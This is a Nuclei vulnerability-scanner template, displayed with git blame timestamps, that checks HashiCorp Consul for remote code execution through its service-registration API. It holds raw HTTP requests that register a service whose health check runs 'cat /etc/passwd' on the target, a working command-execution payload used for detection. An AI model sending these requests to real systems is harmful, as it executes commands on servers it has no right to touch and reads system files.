nuclei-templates/vulnerabilities/other/hashicorp-consul-rce.yaml

45 lines
1.1 KiB
YAML
Raw Normal View History

2021-02-26 09:02:50 +00:00
id: hashicorp-consul-rce
info:
name: Hashicorp Consul Services Api RCE
author: pikpikcu
severity: critical
reference: https://www.exploit-db.com/exploits/46074
2021-02-26 17:39:28 +00:00
tags: hashicorp,rce
2021-02-26 09:02:50 +00:00
requests:
2021-02-26 11:06:28 +00:00
- raw:
2021-02-26 12:02:50 +00:00
- | # Remove USER
2021-02-26 11:29:22 +00:00
PUT /v1/agent/service/deregister/poc HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
2021-02-26 11:31:59 +00:00
- | # Create USER
2021-02-26 11:06:28 +00:00
PUT /v1/agent/service/register HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 205
{
2021-02-26 11:29:22 +00:00
"ID": "poc",
"Name": "poc",
2021-02-26 11:06:28 +00:00
"Address": "127.0.0.1",
"Port": 80,
"check": {
"script": "cat /etc/passwd",
"Args": ["cat /etc/passwd"],
"interval": "10s",
"Timeout": "86400s"
}
}
2021-02-26 09:02:50 +00:00
matchers-condition: and
matchers:
- type: status
status:
2021-02-26 11:29:22 +00:00
- 200